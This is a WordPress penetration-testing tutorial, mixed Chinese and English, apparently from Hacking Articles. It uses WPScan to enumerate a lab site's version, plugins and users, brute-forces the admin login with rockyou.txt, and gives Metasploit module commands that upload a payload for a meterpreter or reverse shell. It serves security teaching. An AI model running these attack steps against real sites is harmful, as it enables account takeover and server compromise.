WPScan-WordPress 渗透测试框架

互联网上的所有其他 Web 应用程序都在内容管理系统上运行，它们要么使用 WordPress、Squarespace、Joomla，要么使用任何其他处于开发阶段的应用程序。那么您的网站是其中之一吗？在本文中，我们将尝试使用最强大的 WordPress 漏洞扫描程序之一（即WPScan）来破坏此类 WordPress 网站。

表中的内容

• 介绍
• 枚举 WordPress Web 应用程序
  • 版本扫描
  • WordPress 主题
  • WordPress 插件
  • WordPress 用户名
  • 全部在一个命令中
• WordPress 漏洞利用
  • 使用 WPScan 进行暴力攻击
  • 使用 Metasploit 进行 Shell 上传
  • 易受攻击的插件利用
• 通过代理服务器扫描
• 启用 HTTP 身份验证的情况下进行扫描

介绍

“WordPress 是最强大的 CMS 平台之一，覆盖了互联网网站总份额的约 35%”。因此，为了枚举此类 Web 应用程序，我们将使用“WPScan”——这是一个用于 WordPress 的黑盒漏洞扫描程序，用 Ruby 编写脚本，重点关注 WordPress 应用程序中存在的不同漏洞，无论是在其主题还是在插件。

嗯，WPScan 预装在 Kali Linux、SamuraiWTF、Pentoo、BlackArch 中；它会扫描其数据库，以找出目标 Web 应用程序中的过时版本和漏洞。

让我们看看 WPScan 可以为我们做的主要事情：

• 检测当前安装的 WordPress 的版本。
• 可以检测敏感文件，如自述文件、robots.txt、数据库替换文件等。
• 检测当前安装的 WordPress 服务器上启用的功能，例如 file_upload。
• 枚举主题、插件及其版本，并判断它们是否过时。
• 它甚至扫描网络应用程序以列出可用的用户名。

在深入研究之前，我建议您查看我们之前的文章，其中我们讨论了“设置 WordPress 渗透测试实验室的多种方法”****。

开始吧！！

如前所述，WPScan 默认安装在 Kali Linux 计算机中，因此我们只需在终端中执行以下命令即可查看默认使用选项。

wpscan-hh

扫描目标网站的 WordPress 版本

由于我们看到了默认选项，现在让我们尝试对我们在之前的文章中设置的易受攻击的 WordPress Web 应用程序进行基本扫描。

键入以下命令来扫描 WordPress 应用程序及其服务器。

wpscan --url http://192.168.1.105/wordpress/

From the below image you can see that it dumps up everything it could – the WordPress version, the Apache server, and even it also found that the upload directory has directory listing enables which means anyone can browse to “/wp-content/uploads” in order to check out the uploaded files and contents.

Enumerating WordPress Themes

Themes play an important role in any CMS web-application, they control the general look & feel of the website including its page layout, widget locations, and the default font and colour preferences.

WPScan uses its database which contains about 2600 themes to check the vulnerable installed one over the targets. 

In order to check the installed themes of the target’s WordPress web-application, type following command:

wpscan --url http://192.168.1.105/wordpresws/ -e at

The “–e” flag is used for enumeration and the “at” flag returns “all themes”.

You can even use the other flags such as “vt”, to list only the vulnerable themes.

Thus running the above command, we will be presented with the installed themes with its version.

Enumerating WordPress Plugins

Plugins are the small piece of codes, that when added to a WordPress web-application, boost up the functionalities, and enhance the website’s features.

But these plugins may sometimes cause great damage to the web-application due to their loosely written codes.

Lets’s check out the installed plugins on our target’s web-application by executing the below command:

wpscan --url http://192.168.1.105/wordpress/ -e ap

Similar to the themes, we can also check the vulnerable plugins by using the “-vp” flag.

After waiting for a few seconds, WPScan will dump our desired result. From the below image, you can see the plugins “mail-masta” and “reflex-gallery” are installed over our target’s website. As a bonus, we even get the last update and the latest version.

Enumerating WordPress Usernames

In order to list out usernames of our target’s website privileged users, execute the following command:

wpscan –url http://192.168.1.105/wordpress/ -e u

The flag “u”  will grab all the usernames and will present a list on our screen.

As WPScan completes its work, we’ll find a list of all the users with their user IDs, in accordance with how it grabbed them.

Enumerate ALL with a single command

Does WPScan give us that privilege to scan up the web-applications to check everything in one go, whether it is its version, the installed themes, or the plugins?

Let’s check this out!

Fire up the following command to grab everything we scanned above for our target web-application.

wpscan --url http://192.168.1.105/wordpress/ -e at –e ap –e u

–e: at: enumerate all themes of targeted website

–e: ap: enumerate all plugins of targeted website

–e: u: enumerate all usernames of targeted website

Brute-force attack using WPScan

With the help of usernames which we enumerated earlier, we can create a word list of all the users and can try a brute-force login attack using the default password list as “rockyou.txt”.  You can learn more about cracking the WordPress logins from here.

From the below image you can see our designed wordlist.

Let’s now try to exploit the website by defacing its login credentials using the following command:

wpscan --url http://192.168.1.105/wordpress/ -U user.txt -P /usr/share/wordlists/rockyou.txt

The –U and the –P  flags are used to set up the username list and the password list respectively.

It will start matching the valid combination of username and password and then dumps the result, from the given image you can see we found the login credentials.

Great!! We got the admin credentials as “admin : jessica”. Let’s try to get into the application’s dashboard with them.

Shell Upload using Metasploit

Isn’t it great if you get the target’s shell?

Run the following commands in order to get a meterpreter session of our target’s web-application.

msf > use exploit/unix/webapp/wp_admin_shell_upload
msf exploit(wp_admin_shell_upload) > set rhosts 192.168.1.105
msf exploit(wp_admin_shell_upload) > set username admin
msf exploit(wp_admin_shell_upload) > set password jessica
msf exploit(wp_admin_shell_upload) > set targeturi /wordpress
msf exploit(wp_admin_shell_upload) > exploit

This module takes an administrator username and password, logs into the admin panel, and uploads a payload packaged as a WordPress plugin. And finally, give us the meterpreter session of the webserver.

Vulnerable Plugin Exploitation

Here in our website, we found a vulnerable plugin i.e. “slideshowgallery” which contains an authenticated file upload vulnerability thus in order to exploit it, we will be using the following module which will offer us a reverse shell.

use exploit/unix/webapp/wp_slideshowgallery_upload
msf exploit(wp_slideshowgallery _upload) > set rhost 192.168.1.105
msf exploit(wp_ slideshowgallery _upload) > set targeturi /wordpress
msf exploit(wp_ slideshowgallery _upload) > set username admin
msf exploit(wp_ slideshowgallery _upload) > set password jessica
msf exploit(wp_ slideshowgallery _upload) > exploit

From the below image you can see that we’ve successfully captured our target’s meterpreter session.

Scanning over a Proxy Server

是否可以扫描通过代理服务器运行的 WordPress Web 应用程序？

许多 Web 应用程序使用代理服务器来确保安全，但 WPScan 为我们提供了使用“–proxy”标志扫描此类 Web 应用程序的优势。

让我们看看如何：

我们的 WordPress Web 应用程序现在正在“端口号为 3128”的代理服务器上运行。您可以从此处了解有关如何设置代理服务器的更多信息。

现在，如果我们尝试使用默认使用选项扫描它，我们将收到错误，并且扫描将停止。因此，让我们尝试使用代理端口来扫描 Web 应用程序。

只需运行以下命令即可绕过此代理服务器：

wpscan --url http://192.168.1.105/wordpress/ --proxy http://192.168.1.105:3128

从下图中您可以看到我们回到了扫描部分。

启用 HTTP 身份验证的情况下进行扫描

许多网站启用 HTTP 身份验证，以便可以向未经身份验证的用户隐藏一些基本和关键信息。

我们还在我们的网站上设置了类似的验证，凭证为“raj：123”。要了解有关 HTTP 身份验证的更多信息，请单击此处。

从下图中您可以看到，当我们尝试正常扫描时，我们收到一条警报“请提供 –http-auth”。

因此，在此警报之后，我们使用了–http-auth并输入了我们的凭据。

wpscan --url http://192.168.1.105/wordpress/ --http-auth raj:123

就这样，我们的扫描现在已经开始了。

作者：  Aarti Singh 是 Hacking Articles 的研究员和技术作家、信息安全顾问、社交媒体爱好者和小工具。联系这里